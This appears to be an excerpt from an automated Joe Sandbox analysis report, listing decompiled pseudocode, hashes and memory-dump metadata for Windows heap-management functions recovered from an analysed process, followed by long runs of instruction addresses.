                                                                                                                              • String ID: , passed to %s$HEAP: $HEAP[%wZ]: $Invalid heap signature for heap at %p$RtlLockHeap
                                                                                                                              • API String ID: 3446177414-1222099010
                                                                                                                              • Opcode ID: 7f05b4f9289feefd240fc138367aced7f13122b283ac2395412c6d266c800dc0
                                                                                                                              • Instruction ID: 4f9b87f24dc1d009ee41dee63f7be9f6446dda6a6b85475b818e9b0bd7ba7cb0
                                                                                                                              • Opcode Fuzzy Hash: 7f05b4f9289feefd240fc138367aced7f13122b283ac2395412c6d266c800dc0
                                                                                                                              • Instruction Fuzzy Hash: 6C3149365187C4EFD712CB18D849FB9B7A4EF05670F094546F8094B6A2D768E580C663
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D7EF51B Relevance: 10.2, Strings: 8, Instructions: 189COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: HEAP: $HEAP[%wZ]: $Invalid CommitSize parameter - %Ix$Invalid ReserveSize parameter - %Ix$May not specify Lock parameter with HEAP_NO_SERIALIZE$Specified HeapBase (%p) != to BaseAddress (%p)$Specified HeapBase (%p) invalid, Status = %lx$Specified HeapBase (%p) is free or not writable
                                                                                                                              • API String ID: 0-2224505338
                                                                                                                              • Opcode ID: cd462f6b98e4784420b1b3e21aef778cd942058c70e4ec562db9c860e5a4d787
                                                                                                                              • Instruction ID: 8682cdaa6dc20ba1afd62d98feac0ccffac1f139f5dc850c8ed8cc6a918ccae7
                                                                                                                              • Opcode Fuzzy Hash: cd462f6b98e4784420b1b3e21aef778cd942058c70e4ec562db9c860e5a4d787
                                                                                                                              • Instruction Fuzzy Hash: FC51013B505144FFC312CFA4D888EBAB3B4EF08AB5F16845AF5059BA63C631E940CA53
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D750680 Relevance: 7.4, APIs: 1, Strings: 3, Instructions: 414COMMONCrypto
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 75%
                                                                                                                              			E1D750680(intOrPtr __ecx, signed int* __edx) {
				signed int* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr* _v24;
				signed int _v28;
				signed int _v32;
				signed char _v56;
				char _v60;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed char _t136;
				signed int _t141;
				void* _t143;
				signed int* _t145;
				signed int* _t146;
				intOrPtr _t148;
				unsigned int _t150;
				char _t162;
				signed int* _t164;
				signed char* _t165;
				intOrPtr _t166;
				signed int* _t168;
				signed char* _t169;
				signed char* _t171;
				signed char* _t180;
				intOrPtr _t195;
				signed int _t197;
				signed int _t209;
				signed char _t210;
				intOrPtr* _t215;
				intOrPtr _t222;
				signed int _t232;
				intOrPtr* _t242;
				intOrPtr _t244;
				unsigned int _t245;
				intOrPtr _t247;
				intOrPtr* _t258;
				signed char _t264;
				unsigned int _t269;
				intOrPtr _t271;
				signed int* _t276;
				signed int _t277;
				void* _t278;
				intOrPtr _t281;
				signed int* _t287;
				intOrPtr _t288;
				unsigned int _t291;
				unsigned int* _t295;
				intOrPtr* _t298;
				intOrPtr _t300;

				_t231 = __edx;
				_v8 = __edx;
				_t300 = __ecx;
				_t298 = E1D750ACE(__edx,  *__edx);
				if(_t298 == __ecx + 0x8c) {
					L45:
					return 0;
				}
				if( *0x1d836960 >= 1) {
					__eflags =  *(_t298 + 0x14) -  *__edx;
					if(__eflags < 0) {
						_t222 =  *[fs:0x30];
						__eflags =  *(_t222 + 0xc);
						if( *(_t222 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(UCRBlock->Size >= *Size)");
						E1D73B910();
						__eflags =  *0x1d835da8;
						if(__eflags == 0) {
							E1D7FFC95(_t231, 1, _t298, __eflags);
						}
					}
				}
				_t136 =  *((intOrPtr*)(_t298 - 2));
				_t4 = _t298 - 8; // -8
				_t232 = _t4;
				if(_t136 != 0) {
					_v12 = (_t232 & 0xffff0000) - ((_t136 & 0x000000ff) << 0x10) + 0x10000;
				} else {
					_v12 = _t300;
				}
				_v20 =  *((intOrPtr*)(_t298 + 0x10));
				_t141 =  *(_t300 + 0xcc) ^  *0x1d836d48;
				_v28 = _t141;
				if(_t141 != 0) {
					 *0x1d8391e0(_t300,  &_v20, _v8);
					_t143 = _v28();
					_t276 = _v8;
					goto L13;
				} else {
					_t295 = _v8;
					if( *(_t298 + 0x14) -  *_t295 <=  *(_t300 + 0x6c) << 3) {
						_t269 =  *(_t298 + 0x14);
						__eflags = _t269 -  *(_t300 + 0x5c) << 3;
						if(__eflags < 0) {
							 *_t295 = _t269;
						}
					}
					if(( *(_t300 + 0x40) & 0x00040000) != 0) {
						_push(0);
						_push(0x1c);
						_v16 = 0x40;
						_push( &_v60);
						_push(3);
						_push(_t300);
						_push(0xffffffff);
						_t209 = E1D782BE0();
						__eflags = _t209;
						_t210 = _v56;
						if(_t209 < 0) {
							L61:
							__eflags = 0;
							E1D805FED(0, _t300, 1, _t210, 0, 0);
							_v16 = 4;
							L62:
							_t276 = _v8;
							goto L8;
						}
						__eflags = _t210 & 0x00000060;
						if((_t210 & 0x00000060) == 0) {
							goto L61;
						}
						__eflags = _v60 - _t300;
						if(__eflags == 0) {
							goto L62;
						}
						goto L61;
					} else {
						_v16 = 4;
						L8:
						_v32 =  *_t276;
						_v28 =  *((intOrPtr*)(_t300 + 0x1f8)) -  *((intOrPtr*)(_t300 + 0x244));
						_t215 = _t300 + 0xd4;
						_v24 = _t215;
						if( *0x1d83373c != 0) {
							L11:
							_push(_v16);
							_push(0x1000);
							_push(_t276);
							_push(0);
							_push( &_v20);
							_push(0xffffffff);
							_t143 = E1D782B10();
							_t276 = _v8;
							L12:
							 *((intOrPtr*)(_t300 + 0x21c)) =  *((intOrPtr*)(_t300 + 0x21c)) + 1;
							L13:
							if(_t143 < 0) {
								 *((intOrPtr*)(_t300 + 0x224)) =  *((intOrPtr*)(_t300 + 0x224)) + 1;
								goto L45;
							}
							_t145 =  *( *[fs:0x30] + 0x50);
							if(_t145 != 0) {
								__eflags =  *_t145;
								if(__eflags == 0) {
									goto L15;
								}
								_t146 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
								L16:
								if( *_t146 != 0) {
									__eflags =  *( *[fs:0x30] + 0x240) & 0x00000001;
									if(__eflags != 0) {
										E1D7FEFD3(_t232, _t300, _v20,  *_t276, 2);
									}
								}
								if( *((intOrPtr*)(_t300 + 0x4c)) != 0) {
									_t291 =  *(_t300 + 0x50) ^  *_t232;
									 *_t232 = _t291;
									_t264 = _t291 >> 0x00000010 ^ _t291 >> 0x00000008 ^ _t291;
									if(_t291 >> 0x18 != _t264) {
										_push(_t264);
										E1D7FD646(_t232, _t300, _t232, _t298, _t300, __eflags);
									}
								}
								 *((char*)(_t232 + 2)) = 0;
								 *((char*)(_t232 + 7)) = 0;
								_t148 =  *((intOrPtr*)(_t298 + 8));
								_t242 =  *((intOrPtr*)(_t298 + 0xc));
								_t277 =  *((intOrPtr*)(_t148 + 4));
								_v32 = _t277;
								_t38 = _t298 + 8; // 0x8
								_t278 = _t38;
								if( *_t242 != _t277 ||  *_t242 != _t278) {
									E1D805FED(0xd, 0, _t278, _v32,  *_t242, 0);
								} else {
									 *_t242 = _t148;
									 *((intOrPtr*)(_t148 + 4)) = _t242;
								}
								_t150 =  *(_t298 + 0x14);
								if(_t150 == 0) {
									L27:
									_t244 = _v12;
									 *((intOrPtr*)(_t244 + 0x30)) =  *((intOrPtr*)(_t244 + 0x30)) - 1;
									 *((intOrPtr*)(_t244 + 0x2c)) =  *((intOrPtr*)(_t244 + 0x2c)) - ( *(_t298 + 0x14) >> 0xc);
									 *((intOrPtr*)(_t300 + 0x1f8)) =  *((intOrPtr*)(_t300 + 0x1f8)) +  *(_t298 + 0x14);
									 *((intOrPtr*)(_t300 + 0x20c)) =  *((intOrPtr*)(_t300 + 0x20c)) + 1;
									 *((intOrPtr*)(_t300 + 0x208)) =  *((intOrPtr*)(_t300 + 0x208)) - 1;
									_t245 =  *(_t298 + 0x14);
									if(_t245 >= 0x7f000) {
										 *((intOrPtr*)(_t300 + 0x1fc)) =  *((intOrPtr*)(_t300 + 0x1fc)) - _t245;
										_t245 =  *(_t298 + 0x14);
									}
									_t280 = _v8;
									_t154 =  *_v8;
									if(_t245 <=  *_v8) {
										_t281 = _v12;
										__eflags =  *((intOrPtr*)(_t298 + 0x10)) + _t245 -  *((intOrPtr*)(_t281 + 0x28));
										_t280 = _v8;
										if( *((intOrPtr*)(_t298 + 0x10)) + _t245 !=  *((intOrPtr*)(_t281 + 0x28))) {
											 *_t280 =  *_t280 + ( *_t232 & 0x0000ffff) * 8;
											goto L30;
										}
										_t154 =  *_t280;
										goto L29;
									} else {
										L29:
										E1D75096B(_t300, _v12,  *((intOrPtr*)(_t298 + 0x10)) + 0xffffffe8 +  *_t280, _t245 - _t154, _t232, _t280);
										 *_v8 =  *_v8 << 3;
										L30:
										_t247 = _v12;
										 *((char*)(_t232 + 3)) = 0;
										_t282 =  *((intOrPtr*)(_t247 + 0x18));
										if( *((intOrPtr*)(_t247 + 0x18)) != _t247) {
											_t162 = (_t232 - _t247 >> 0x10) + 1;
											_v32 = _t162;
											__eflags = _t162 - 0xfe;
											if(_t162 >= 0xfe) {
												E1D805FED(3, _t282, _t232, _t247, 0, 0);
												_t162 = _v32;
											}
										} else {
											_t162 = 0;
										}
										 *((char*)(_t232 + 6)) = _t162;
										_t164 =  *( *[fs:0x30] + 0x50);
										if(_t164 != 0) {
											__eflags =  *_t164;
											if( *_t164 == 0) {
												goto L33;
											}
											_t165 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
											L34:
											if( *_t165 != 0) {
												_t166 =  *[fs:0x30];
												__eflags =  *(_t166 + 0x240) & 0x00000001;
												if(( *(_t166 + 0x240) & 0x00000001) == 0) {
													goto L35;
												}
												__eflags = E1D753C40();
												if(__eflags == 0) {
													_t180 = 0x7ffe0380;
												} else {
													_t180 =  &(( *( *[fs:0x30] + 0x50))[0x89]);
												}
												_t299 = _v8;
												E1D7FF1C3(_t232, _t300, _t232, __eflags,  *_v8,  *(_t300 + 0x74) << 3,  *_t180 & 0x000000ff);
												L36:
												_t168 =  *( *[fs:0x30] + 0x50);
												if(_t168 != 0) {
													__eflags =  *_t168;
													if( *_t168 == 0) {
														goto L37;
													}
													_t169 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
													L38:
													if( *_t169 != 0) {
														__eflags = E1D753C40();
														if(__eflags == 0) {
															_t171 = 0x7ffe038a;
														} else {
															_t171 =  &(( *( *[fs:0x30] + 0x50))[0x8c]);
														}
														E1D7FF1C3(_t232, _t300, _t232, __eflags,  *_t299,  *(_t300 + 0x74) << 3,  *_t171 & 0x000000ff);
													}
													return _t232;
												}
												L37:
												_t169 = 0x7ffe038a;
												goto L38;
											}
											L35:
											_t299 = _v8;
											goto L36;
										}
										L33:
										_t165 = 0x7ffe0380;
										goto L34;
									}
								} else {
									_t287 =  *(_t300 + 0xb8);
									if(_t287 != 0) {
										_t256 = _t150 >> 0xc;
										__eflags = _t256 - _t287[1];
										if(_t256 < _t287[1]) {
											L79:
											E1D75036A(_t300, _t287, 0, _t298, _t256, _t150);
											goto L24;
										} else {
											goto L75;
										}
										while(1) {
											L75:
											_t197 =  *_t287;
											__eflags = _t197;
											_v32 = _t197;
											_t150 =  *(_t298 + 0x14);
											if(_t197 == 0) {
												break;
											}
											_t287 = _v32;
											__eflags = _t256 - _t287[1];
											if(_t256 >= _t287[1]) {
												continue;
											}
											goto L79;
										}
										_t256 = _t287[1] - 1;
										__eflags = _t287[1] - 1;
										goto L79;
									}
									L24:
									_t258 =  *((intOrPtr*)(_t298 + 4));
									_t195 =  *_t298;
									_t288 =  *_t258;
									if(_t288 !=  *((intOrPtr*)(_t195 + 4)) || _t288 != _t298) {
										E1D805FED(0xd, 0, _t298,  *((intOrPtr*)(_t195 + 4)), _t288, 0);
									} else {
										 *_t258 = _t195;
										 *((intOrPtr*)(_t195 + 4)) = _t258;
									}
									goto L27;
								}
							}
							L15:
							_t146 = 0x7ffe0380;
							goto L16;
						}
						_t271 =  *_t215;
						if(_t271 != 0) {
							L63:
							_t101 = _t298 - 8; // -8
							_t232 = _t101;
							__eflags = _v28 +  *_t276 - _t271;
							if(__eflags <= 0) {
								goto L11;
							}
							_t220 =  *(_v24 + 4);
							__eflags =  *(_v24 + 4);
							if(__eflags != 0) {
								E1D805FED(0x15, _t300, 0, _t220, _v32, _v28);
								_t276 = _v8;
							}
							_t143 = 0xc000012d;
							goto L12;
						}
						_t271 =  *0x1d83432c; // 0x0
						_v24 = 0x1d83432c;
						if(_t271 != 0) {
							goto L63;
						}
						goto L11;
					}
				}
			}
























































                                                                                                                              0x1d750689
                                                                                                                              0x1d75068d
                                                                                                                              0x1d750690
                                                                                                                              0x1d750699
                                                                                                                              0x1d7506a3
                                                                                                                              0x1d750929
                                                                                                                              0x00000000
                                                                                                                              0x1d750929
                                                                                                                              0x1d7506b0
                                                                                                                              0x1d7a4e97
                                                                                                                              0x1d7a4e99
                                                                                                                              0x1d7a4e9f
                                                                                                                              0x1d7a4ea5
                                                                                                                              0x1d7a4ea9
                                                                                                                              0x1d7a4eca
                                                                                                                              0x1d7a4ecf
                                                                                                                              0x1d7a4eab
                                                                                                                              0x1d7a4ec0
                                                                                                                              0x1d7a4ec5
                                                                                                                              0x1d7a4ed7
                                                                                                                              0x1d7a4edc
                                                                                                                              0x1d7a4ee4
                                                                                                                              0x1d7a4eeb
                                                                                                                              0x1d7a4ef6
                                                                                                                              0x1d7a4ef6
                                                                                                                              0x1d7a4eeb
                                                                                                                              0x1d7a4e99
                                                                                                                              0x1d7506b6
                                                                                                                              0x1d7506b9
                                                                                                                              0x1d7506b9
                                                                                                                              0x1d7506be
                                                                                                                              0x1d750921
                                                                                                                              0x1d7506c4
                                                                                                                              0x1d7506c4
                                                                                                                              0x1d7506c4
                                                                                                                              0x1d7506ca
                                                                                                                              0x1d7506d3
                                                                                                                              0x1d7506d9
                                                                                                                              0x1d7506dc
                                                                                                                              0x1d7a4f0a
                                                                                                                              0x1d7a4f10
                                                                                                                              0x1d7a4f13
                                                                                                                              0x00000000
                                                                                                                              0x1d7506e2
                                                                                                                              0x1d7506e2
                                                                                                                              0x1d7506f2
                                                                                                                              0x1d750930
                                                                                                                              0x1d750936
                                                                                                                              0x1d750938
                                                                                                                              0x1d75093e
                                                                                                                              0x1d75093e
                                                                                                                              0x1d750938
                                                                                                                              0x1d7506ff
                                                                                                                              0x1d7a4f1b
                                                                                                                              0x1d7a4f1d
                                                                                                                              0x1d7a4f22
                                                                                                                              0x1d7a4f29
                                                                                                                              0x1d7a4f2a
                                                                                                                              0x1d7a4f2c
                                                                                                                              0x1d7a4f2d
                                                                                                                              0x1d7a4f2f
                                                                                                                              0x1d7a4f34
                                                                                                                              0x1d7a4f36
                                                                                                                              0x1d7a4f39
                                                                                                                              0x1d7a4f44
                                                                                                                              0x1d7a4f4d
                                                                                                                              0x1d7a4f4f
                                                                                                                              0x1d7a4f54
                                                                                                                              0x1d7a4f5b
                                                                                                                              0x1d7a4f5b
                                                                                                                              0x00000000
                                                                                                                              0x1d7a4f5b
                                                                                                                              0x1d7a4f3b
                                                                                                                              0x1d7a4f3d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a4f3f
                                                                                                                              0x1d7a4f42
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d750705
                                                                                                                              0x1d750705
                                                                                                                              0x1d75070c
                                                                                                                              0x1d75070e
                                                                                                                              0x1d750724
                                                                                                                              0x1d750727
                                                                                                                              0x1d75072d
                                                                                                                              0x1d750730
                                                                                                                              0x1d750751
                                                                                                                              0x1d750751
                                                                                                                              0x1d750757
                                                                                                                              0x1d75075c
                                                                                                                              0x1d75075d
                                                                                                                              0x1d75075f
                                                                                                                              0x1d750760
                                                                                                                              0x1d750762
                                                                                                                              0x1d750767
                                                                                                                              0x1d75076a
                                                                                                                              0x1d75076a
                                                                                                                              0x1d750770
                                                                                                                              0x1d750772
                                                                                                                              0x1d7a4f9f
                                                                                                                              0x00000000
                                                                                                                              0x1d7a4f9f
                                                                                                                              0x1d75077e
                                                                                                                              0x1d750783
                                                                                                                              0x1d7a4faa
                                                                                                                              0x1d7a4fad
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a4fbc
                                                                                                                              0x1d75078e
                                                                                                                              0x1d750791
                                                                                                                              0x1d7a4fcc
                                                                                                                              0x1d7a4fd3
                                                                                                                              0x1d7a4fe2
                                                                                                                              0x1d7a4fe2
                                                                                                                              0x1d7a4fd3
                                                                                                                              0x1d75079b
                                                                                                                              0x1d7507a0
                                                                                                                              0x1d7507a4
                                                                                                                              0x1d7507b0
                                                                                                                              0x1d7507b7
                                                                                                                              0x1d7a4fec
                                                                                                                              0x1d7a4ff1
                                                                                                                              0x1d7a4ff1
                                                                                                                              0x1d7507b7
                                                                                                                              0x1d7507bd
                                                                                                                              0x1d7507c1
                                                                                                                              0x1d7507c5
                                                                                                                              0x1d7507c8
                                                                                                                              0x1d7507cb
                                                                                                                              0x1d7507d0
                                                                                                                              0x1d7507d3
                                                                                                                              0x1d7507d3
                                                                                                                              0x1d7507d6
                                                                                                                              0x1d7a5008
                                                                                                                              0x1d7507e4
                                                                                                                              0x1d7507e4
                                                                                                                              0x1d7507e6
                                                                                                                              0x1d7507e6
                                                                                                                              0x1d7507e9
                                                                                                                              0x1d7507ee
                                                                                                                              0x1d75081b
                                                                                                                              0x1d75081b
                                                                                                                              0x1d75081e
                                                                                                                              0x1d750827
                                                                                                                              0x1d75082d
                                                                                                                              0x1d750833
                                                                                                                              0x1d750839
                                                                                                                              0x1d75083f
                                                                                                                              0x1d750848
                                                                                                                              0x1d7508fd
                                                                                                                              0x1d750903
                                                                                                                              0x1d750903
                                                                                                                              0x1d75084e
                                                                                                                              0x1d750851
                                                                                                                              0x1d750855
                                                                                                                              0x1d750945
                                                                                                                              0x1d75094d
                                                                                                                              0x1d750950
                                                                                                                              0x1d750953
                                                                                                                              0x1d750964
                                                                                                                              0x00000000
                                                                                                                              0x1d750964
                                                                                                                              0x1d750955
                                                                                                                              0x00000000
                                                                                                                              0x1d75085b
                                                                                                                              0x1d75085b
                                                                                                                              0x1d75086e
                                                                                                                              0x1d750876
                                                                                                                              0x1d750879
                                                                                                                              0x1d750879
                                                                                                                              0x1d75087c
                                                                                                                              0x1d750880
                                                                                                                              0x1d750885
                                                                                                                              0x1d7508dd
                                                                                                                              0x1d7508de
                                                                                                                              0x1d7508e1
                                                                                                                              0x1d7508e6
                                                                                                                              0x1d7508f3
                                                                                                                              0x1d7508f8
                                                                                                                              0x1d7508f8
                                                                                                                              0x1d750887
                                                                                                                              0x1d750887
                                                                                                                              0x1d750887
                                                                                                                              0x1d750889
                                                                                                                              0x1d750892
                                                                                                                              0x1d750897
                                                                                                                              0x1d7a505d
                                                                                                                              0x1d7a5060
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a506f
                                                                                                                              0x1d7508a2
                                                                                                                              0x1d7508a5
                                                                                                                              0x1d7a5079
                                                                                                                              0x1d7a507f
                                                                                                                              0x1d7a5086
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5091
                                                                                                                              0x1d7a5093
                                                                                                                              0x1d7a50a5
                                                                                                                              0x1d7a5095
                                                                                                                              0x1d7a509e
                                                                                                                              0x1d7a509e
                                                                                                                              0x1d7a50af
                                                                                                                              0x1d7a50be
                                                                                                                              0x1d7508ae
                                                                                                                              0x1d7508b4
                                                                                                                              0x1d7508b9
                                                                                                                              0x1d7a50c8
                                                                                                                              0x1d7a50cb
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a50da
                                                                                                                              0x1d7508c4
                                                                                                                              0x1d7508c7
                                                                                                                              0x1d7a50e9
                                                                                                                              0x1d7a50eb
                                                                                                                              0x1d7a50fd
                                                                                                                              0x1d7a50ed
                                                                                                                              0x1d7a50f6
                                                                                                                              0x1d7a50f6
                                                                                                                              0x1d7a5113
                                                                                                                              0x1d7a5113
                                                                                                                              0x00000000
                                                                                                                              0x1d7508cd
                                                                                                                              0x1d7508bf
                                                                                                                              0x1d7508bf
                                                                                                                              0x00000000
                                                                                                                              0x1d7508bf
                                                                                                                              0x1d7508ab
                                                                                                                              0x1d7508ab
                                                                                                                              0x00000000
                                                                                                                              0x1d7508ab
                                                                                                                              0x1d75089d
                                                                                                                              0x1d75089d
                                                                                                                              0x00000000
                                                                                                                              0x1d75089d
                                                                                                                              0x1d7507f0
                                                                                                                              0x1d7507f0
                                                                                                                              0x1d7507f8
                                                                                                                              0x1d7a5014
                                                                                                                              0x1d7a5017
                                                                                                                              0x1d7a501a
                                                                                                                              0x1d7a5036
                                                                                                                              0x1d7a503d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a501c
                                                                                                                              0x1d7a501c
                                                                                                                              0x1d7a501c
                                                                                                                              0x1d7a501e
                                                                                                                              0x1d7a5020
                                                                                                                              0x1d7a5023
                                                                                                                              0x1d7a5026
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5028
                                                                                                                              0x1d7a502b
                                                                                                                              0x1d7a502e
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5030
                                                                                                                              0x1d7a5035
                                                                                                                              0x1d7a5035
                                                                                                                              0x00000000
                                                                                                                              0x1d7a5035
                                                                                                                              0x1d7507fe
                                                                                                                              0x1d7507fe
                                                                                                                              0x1d750801
                                                                                                                              0x1d750803
                                                                                                                              0x1d750808
                                                                                                                              0x1d7a5053
                                                                                                                              0x1d750816
                                                                                                                              0x1d750816
                                                                                                                              0x1d750818
                                                                                                                              0x1d750818
                                                                                                                              0x00000000
                                                                                                                              0x1d750808
                                                                                                                              0x1d7507ee
                                                                                                                              0x1d750789
                                                                                                                              0x1d750789
                                                                                                                              0x00000000
                                                                                                                              0x1d750789
                                                                                                                              0x1d750732
                                                                                                                              0x1d750736
                                                                                                                              0x1d7a4f63
                                                                                                                              0x1d7a4f66
                                                                                                                              0x1d7a4f66
                                                                                                                              0x1d7a4f6b
                                                                                                                              0x1d7a4f6d
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d7a4f76
                                                                                                                              0x1d7a4f79
                                                                                                                              0x1d7a4f7b
                                                                                                                              0x1d7a4f8d
                                                                                                                              0x1d7a4f92
                                                                                                                              0x1d7a4f92
                                                                                                                              0x1d7a4f95
                                                                                                                              0x00000000
                                                                                                                              0x1d7a4f95
                                                                                                                              0x1d75073c
                                                                                                                              0x1d750742
                                                                                                                              0x1d75074b
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x00000000
                                                                                                                              0x1d75074b
                                                                                                                              0x1d7506ff

                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000007.00000002.42268320726.000000001D710000.00000040.00000800.00020000.00000000.sdmp, Offset: 1D710000, based on PE: true
                                                                                                                              • Associated: 00000007.00000002.42269843013.000000001D839000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              • Associated: 00000007.00000002.42269890824.000000001D83D000.00000040.00000800.00020000.00000000.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_7_2_1d710000_aSsc9zh1ex.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID:
                                                                                                                              • String ID: (UCRBlock->Size >= *Size)$HEAP: $HEAP[%wZ]:
                                                                                                                              • API String ID: 0-4253913091
                                                                                                                              • Opcode ID: 28c6a76f444b6603a381041a5d3b4bd1ca4915653935f9e4edc9b1a6b5262f9a
                                                                                                                              • Instruction ID: b1a32db5e27ea7a8a815fa0d8b3a1a352090a23889a7b81bf2d67da1239eed01
                                                                                                                              • Opcode Fuzzy Hash: 28c6a76f444b6603a381041a5d3b4bd1ca4915653935f9e4edc9b1a6b5262f9a
                                                                                                                              • Instruction Fuzzy Hash: E5F1CB34A00652DFDB06CF28C884F6AB7B1FF44724F1486AAE5099B391D734F981CB92
                                                                                                                              Uniqueness

                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                              Function 1D73F8B0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 263timeCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              C-Code - Quality: 65%
                                                                                                                              			E1D73F8B0(signed int __edx, signed int _a4) {
				signed int _v8;
				void* _v28;
				void* _v54;
				void* _v60;
				void* _v64;
				char _v88;
				void* _v90;
				signed int _v92;
				char _v96;
				void* _v100;
				void* _v104;
				void* _v108;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed int _t62;
				intOrPtr _t64;
				intOrPtr _t73;
				signed int* _t86;
				signed int _t87;
				signed int _t91;
				char* _t92;
				char _t96;
				void* _t102;
				signed int* _t105;
				intOrPtr _t106;
				void* _t107;
				signed int* _t110;
				signed int _t111;
				char* _t118;
				signed int _t121;
				signed int _t127;
				void* _t128;
				void* _t129;
				signed int _t131;
				signed int _t132;
				void* _t139;
				signed int _t161;
				void* _t162;
				void* _t164;
				intOrPtr* _t166;
				void* _t169;
				signed int* _t170;
				signed int* _t171;
				signed int _t174;
				signed int _t176;

				_t158 = __edx;
				_t176 = (_t174 & 0xfffffff8) - 0x64;
				_v8 =  *0x1d83b370 ^ _t176;
				_push(_t128);
				_t161 = _a4;
				if(_t161 == 0) {
					__eflags =  *0x1d836960 - 2;
					if( *0x1d836960 >= 2) {
						_t64 =  *[fs:0x30];
						__eflags =  *(_t64 + 0xc);
						if( *(_t64 + 0xc) == 0) {
							_push("HEAP: ");
							E1D73B910();
						} else {
							E1D73B910("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
						}
						_push("(HeapHandle != NULL)");
						E1D73B910();
						__eflags =  *0x1d835da8;
						if(__eflags == 0) {
							_t139 = 2;
							E1D7FFC95(_t128, _t139, _t161, __eflags);
						}
					}
					L26:
					_t62 = 0;
					L27:
					_pop(_t162);
					_pop(_t164);
					_pop(_t129);
					return E1D784B50(_t62, _t129, _v8 ^ _t176, _t158, _t162, _t164);
				}
				if( *((intOrPtr*)(_t161 + 8)) == 0xddeeddee) {
					_t73 =  *[fs:0x30];
					__eflags = _t161 -  *((intOrPtr*)(_t73 + 0x18));
					if(_t161 ==  *((intOrPtr*)(_t73 + 0x18))) {
						L30:
						_t62 = _t161;
						goto L27;
					}
					_t141 =  *(_t161 + 0x10);
					__eflags =  *(_t161 + 0x10);
					if( *(_t161 + 0x10) != 0) {
						_t158 = _t161;
						E1D7E78DE(_t141, _t161, 0, 8, 0);
					}
					E1D73FD8E(_t161, _t158);
					E1D8002EC(_t161);
					_t158 = 1;
					E1D73918A(_t161, 1, 0, 0);
					E1D808E26(_t161);
					goto L26;
				}
				if(( *(_t161 + 0x44) & 0x01000000) != 0) {
					_t166 =  *0x1d833758; // 0x0
					 *0x1d8391e0(_t161);
					_t62 =  *_t166();
					goto L27;
				}
				_t7 = _t161 + 0x58; // 0x8953046a
				_t147 =  *_t7;
				if( *_t7 != 0) {
					_t158 = _t161;
					E1D7E78DE(_t147, _t161, 0, 8, 0);
				}
				E1D73FD8E(_t161, _t158);
				if(( *(_t161 + 0x40) & 0x61000000) != 0) {
					__eflags =  *(_t161 + 0x40) & 0x10000000;
					if(( *(_t161 + 0x40) & 0x10000000) != 0) {
						goto L5;
					}
					_t127 = E1D7EF85F(_t161);
					__eflags = _t127;
					if(_t127 == 0) {
						goto L30;
					}
					goto L5;
				} else {
					L5:
					if(_t161 ==  *((intOrPtr*)( *[fs:0x30] + 0x18))) {
						goto L30;
					} else {
						E1D74FED0(0x1d834800);
						E1D73FAEC(_t161);
						_push(0x1d834800);
						E1D74E740(_t161);
						_t86 = _t161 + 0x9c;
						_t131 =  *_t86;
						while(_t86 != _t131) {
							_t87 = _t131;
							_t158 =  &_v92;
							_t131 =  *_t131;
							_v92 = _t87 & 0xffff0000;
							_v96 = 0;
							E1D73FABA( &_v92,  &_v96, 0x8000);
							_t91 = E1D753C40();
							__eflags = _t91;
							if(_t91 == 0) {
								_t92 = 0x7ffe0388;
							} else {
								_t92 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22e;
							}
							__eflags =  *_t92;
							if( *_t92 != 0) {
								_t158 = _v92;
								E1D7FDA30(_t131, _t161, _v92, _v96);
							}
							_t86 = _t161 + 0x9c;
						}
						if( *((char*)(_t161 + 0xea)) == 2) {
